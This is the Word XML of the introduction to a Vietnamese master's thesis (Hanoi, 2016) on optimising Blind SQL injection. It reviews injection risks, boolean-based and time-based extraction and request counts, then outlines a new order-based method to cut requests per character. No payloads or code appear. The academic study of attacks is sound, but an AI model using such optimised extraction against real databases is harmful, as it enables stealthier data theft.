    <w:p w:rsidR="00EE08FC" w:rsidRPr="001604F9" w:rsidRDefault="00EE08FC" w:rsidP="00EE08FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Diện mạo những mối nguy cơ về ứng dụng web trên Internet thay đổi một cách liên tục. Nguyên nhân chính về sự phát triển này là sự tiến bộ của kẻ tấn công, sự ra đời của những công nghệ mới, và sự thiết  lập của những hệ thống ngày một phức tạp. Để theo kịp tốc độ đó, hàng năm tổ chức OWASP (Open Web Application Security Project – dự án mở về bảo mật ứng dụng web) đều cập nhật, đưa ra tài liệu OWASP Top 10, là tài liệu trình bày về top 10 rủi ro an ninh của ứng dụng web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRPr="001604F9" w:rsidRDefault="00EE08FC" w:rsidP="007E66F1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Đứng đầu trong danh sách 10 rủi ro an toàn thông tin của ứng dụng web này chính là lỗ</w:t>
      </w:r>
      <w:r w:rsidR="007E66F1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>i nh</w:t>
      </w:r>
      <w:r w:rsidR="00F86F13">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>ú</w:t>
      </w:r>
      <w:r w:rsidR="007E66F1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>ng mã</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E66F1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:r w:rsidR="007E66F1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AD4AA4">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Lỗi này thường xuất hiện</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong các ứng dụ</w:t>
      </w:r>
      <w:r w:rsidR="00503901">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">ng </w:t>
      </w:r>
      <w:r w:rsidR="001D7BA6">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>sử dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL, LDAP</w:t>
      </w:r>
      <w:r w:rsidR="001D7BA6">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> khi những dữ liệu không xác thực được gửi đến hệ thống, biên dịch như một phần của mã lệnh. Những dữ liệu của kẻ tấn </w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>công có thể lừa hệ thống biên dịch thực hiện những mã lệnh độc hại hoặc giúp kẻ tấn công xâm nhập đến những dữ liệu quan trọng một cách trái phép.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRPr="001604F9" w:rsidRDefault="00EE08FC" w:rsidP="00EE08FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Tấn công nhúng mã SQL, hay còn được gọi là SQL injection, là dạng tấn công phổ biến nhất của tấn công nhúng mã. Tấn công này tập trung vào đối tượng là các cơ sở dữ liệu SQL.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Được coi là trái tim của toàn bộ hệ thống, cơ sở dữ liệu chính là mục tiêu của hầu hết các cuộc tấn công mạng. Khai thác lỗi SQL injection, kẻ tấn công có thể khiến hệ thống mất mát dữ liệu, hư hỏng hoặc không thể kiểm tra hay truy cập đến dữ liệu. Năng hơn có thể dẫn đến toàn bộ hệ thống bị chiếm quyền.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRPr="001604F9" w:rsidRDefault="00EE08FC" w:rsidP="00EE08FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Đối với ứng dụng web, ai cũng có thể gửi các dữ liệu không tin cập đến hệ thống: bao gồm người dùng bên ngoài, nội bộ, hay quản trị viên. Kẻ tấn công có thể gửi những mã tấn công dạng văn bản, khai th</w:t>
      </w:r>
      <w:r w:rsidR="00F86F13">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">c sơ hở trong cú pháp truy vấn SQL. Bằng cách nhúng các mã SQL query/command vào đầu vào từ người dùng, trước khi chuyển cho ứng dụng web xử lý, kẻ tấn công có thể buộc ứng dụng thực thi đoạn mã SQL đó, từ đó có thể chiếm quyền điều khiển ứng dụng và máy chủ </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2A61">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>[1][</w:t>
      </w:r>
      <w:r w:rsidR="0014540A">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2A61">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRDefault="00EE08FC" w:rsidP="00EE08FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong các dạng tấn công SQL injection, Blind SQL injection là dạng rất phổ biến. Tấn công này sẽ phân tích nội dung trả về để xác định kết quả câu truy vấn được gửi đến ứng dụng web thực thi, để từ đó biết được kết quả câu truy vấn là đúng hay là sai. Có 02 kiểu phân tích phổ biến là: Boolean base (dựa vào nội dung trả về là đúng hay sai) và Time base (dựa trên thời gian trả về) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2A61">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="0014540A">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2A61">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRDefault="00EE08FC" w:rsidP="00EE08FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Phương pháp khai thác lỗ hổng Blind SQL injection truyền thống sẽ tấn công vét cạn, lần lượt gửi các yêu cầu truy vấn để hỏi ký tự cần lấy có phải là ký tự trong bảng mã ASCII hay không. Bảng mã ASCII có 256 ký tự, trong đó có khoảng 128 ký dạng dạng có thể in được (printable character) do đó yêu cầu phải sử dụng đến 128 lần gửi yêu cầu để có thể lấy về một ký tự </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8166F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="0014540A">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A8166F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Điều </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>này làm tiêu tốn nhiều thời gian, băng thông cho một cuộc tấn công, do đó, dễ dàng cho phép các hệ thống phát hiện xâm nhập IDS phát hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRPr="00331730" w:rsidRDefault="00EE08FC" w:rsidP="00EE08FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ngày nay, trên thế giới liên tục có các nghiên cứu nhằm mục tiêu tối ưu hóa tấn công Blind SQL injection, mục tiêu giảm số lượng yêu cầu cần gửi xuống tối đa có thể</w:t>
      </w:r>
      <w:r w:rsidR="00D707EC">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="003710C8">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Hầu hết các kỹ thuật </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">tối ưu </w:t>
      </w:r>
      <w:r w:rsidRPr="003710C8">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>hiện</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> có trên thế giới cho phép với 7 lần yêu cầu có thể lấy về một ký tự </w:t>
      </w:r>
      <w:r w:rsidRPr="001F5EAC">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="0014540A">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5EAC">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, có nghĩa là giảm hơn 18 lần so với phương pháp truyền thống</w:t>
      </w:r>
      <w:r w:rsidRPr="003710C8">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRDefault="00EE08FC" w:rsidP="00781B18">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Với mục đích tối ưu hóa tấn công Blind SQL injection về số lượng yêu cầu cần gửi đi, em lựa chọn đề tài “</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92936">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nghiên cứu giải pháp tối ưu hóa tấn công Blind SQL injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">” làm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>đề tài</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> luận văn tốt nghiệp thạc sĩ chuyên ngành An toàn thông tin. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Đề tài l</w:t>
      </w:r>
      <w:r w:rsidRPr="003710C8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">uận văn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sẽ đi sâu vào nghiên cứu, tìm hiểu</w:t>
      </w:r>
      <w:r w:rsidRPr="003710C8">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> mộ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">t </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kỹ thuật tối ưu hóa mới, dựa vào phân tích thứ tự của dữ liệu trả về để từ đó có thể trích xuất ra dữ liệu mong muốn, giúp tối ưu nữa so với các phương pháp tối ưu hóa hiện có.</w:t>
      </w:r>
      <w:r w:rsidR="00781B18">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uận văn đề cập đến một phương pháp mới trong việc tấn công Blind SQL injection. Hiện nay c</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95DA1">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ác phương pháp tấn công Blind SQL injection </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92936">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="0014540A">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92936">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="000E500A">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="0014540A">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="000E500A">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00752F61">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C95DA1">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>thường tận dụng việc phân tích các dạ</w:t>
      </w:r>
      <w:r w:rsidR="009201E8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ng </w:t>
      </w:r>
      <w:r w:rsidRPr="00C95DA1">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dữ liệu trả về đơn giản (nội dung cơ bản, thời gian trả về). Các phương pháp này chỉ cho phép trong một lần yêu cầu trả về được hai kết quả (Đúng hoặc sai). Phương pháp được nghiên cứu trong đề tài dựa trên việc phân tích nội dung thứ tự của dữ liệu trả về, từ đó lấy được ra nhiều hơn hai kết quả trả về. Dựa vào đó, giảm số lần yêu cầu xuống, giúp tiết kiệm thời gian, băng thông so với các phương pháp trước đây.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E19C9" w:rsidRDefault="004E19C9" w:rsidP="00781B18">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Luận văn gồm 03 chương với nội dung cơ bản sau đây:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E19C9" w:rsidRPr="00016508" w:rsidRDefault="004E19C9" w:rsidP="00016508">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016508">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Chương 1:</w:t>
      </w:r>
      <w:r w:rsidR="00016508" w:rsidRPr="00016508">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trình bày về tấn công SQL injection nói chung, Blind SQL injection nói riêng, trong đó bao gồm nguyên nhân, các kỹ thuật khai thác phổ biến.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E19C9" w:rsidRPr="00016508" w:rsidRDefault="004E19C9" w:rsidP="00016508">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016508">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Chương 2:</w:t>
      </w:r>
      <w:r w:rsidR="00207DB9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trình bày các phương pháp tối ưu hóa trong tấn công Blind SQL injection trên thế giớ</w:t>
      </w:r>
      <w:r w:rsidR="00D53D34">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00207DB9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E19C9" w:rsidRPr="00016508" w:rsidRDefault="004E19C9" w:rsidP="00016508">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016508">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chương 3:</w:t>
      </w:r>
      <w:r w:rsidR="00207DB9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C93A9C">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Đề xuất phương pháp tối ưu hóa dựa trên phân tích thứ tự nội dung trả về và xây dựng thực nghiệm, kiểm chứng thực tế các phương pháp tối ưu đã trình bày trong luận văn</w:t>
      </w:r>
      <w:r w:rsidR="00207DB9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E0ED1" w:rsidRPr="004E19C9" w:rsidRDefault="004E19C9" w:rsidP="004E19C9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E19C9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Mặc dù đã hết sức </w:t>
      </w:r>
      <w:r w:rsidR="006A2294">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cố gắng</w:t>
      </w:r>
      <w:r w:rsidRPr="004E19C9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006A2294">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E19C9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>song do thời gian và kinh nghiệm nghiên cứu khoa học còn</w:t>
      </w:r>
      <w:r w:rsidR="00FB7CA3">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E19C9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hạn</w:t>
      </w:r>
      <w:r w:rsidR="008A5E05">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E19C9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>chế nên không</w:t>
      </w:r>
      <w:r w:rsidR="00FB7CA3">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E19C9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>thể tránh khỏi những thiếu sót. Em rất mong nhận đ</w:t>
      </w:r>
      <w:r w:rsidR="004A153F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ược</w:t>
      </w:r>
      <w:r w:rsidRPr="004E19C9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> sự góp ý của các thầ</w:t>
      </w:r>
      <w:r w:rsidR="008A5E05">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">y cô và </w:t>
      </w:r>
      <w:r w:rsidRPr="004E19C9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bạn bè đồng nghiệp để hiểu biết của mình ngày một hoàn thiện hơn.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E19C9" w:rsidRPr="004E19C9" w:rsidRDefault="004E19C9" w:rsidP="004E19C9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E19C9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Qua luận văn này em xin chân thành cả</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>m ơn: T</w:t>
      </w:r>
      <w:r w:rsidRPr="004E19C9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">S </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Đỗ Quang Trung</w:t>
      </w:r>
      <w:r w:rsidRPr="004E19C9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00060689">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Học viện Kỹ thuật Mật mã</w:t>
      </w:r>
      <w:r w:rsidRPr="004E19C9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã tận tình giúp đỡ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004E19C9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>đị</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nh hư</w:t>
      </w:r>
      <w:r w:rsidRPr="004E19C9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ớ</w:t>
      </w:r>
      <w:r w:rsidR="008A5E05">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ng, hướ</w:t>
      </w:r>
      <w:r w:rsidRPr="004E19C9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ng dẫn em nghiên cứu và hoàn thành luận văn này. Em xin cảm ơn các thầy cô giáo trong </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Học viện Kỹ thuật Mật mã</w:t>
      </w:r>
      <w:r w:rsidRPr="004E19C9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã giảng dạy và giúp đỡ em trong hai năm học qua, cảm ơn sự giúp đỡ nhiệt tình của các bạn đồng nghiệp</w:t>
      </w:r>
      <w:r>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13"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6428" w:rsidTr="002C6428">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4491" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002C6428" w:rsidRDefault="00EE08FC" w:rsidP="00E14CFD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br w:type="page"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4513" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002C6428" w:rsidRDefault="002C6428" w:rsidP="00E14CFD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Hà Nội, tháng 8 năm 2016</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C6428" w:rsidRDefault="002C6428" w:rsidP="00E14CFD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Học viên thực hiện</w:t>
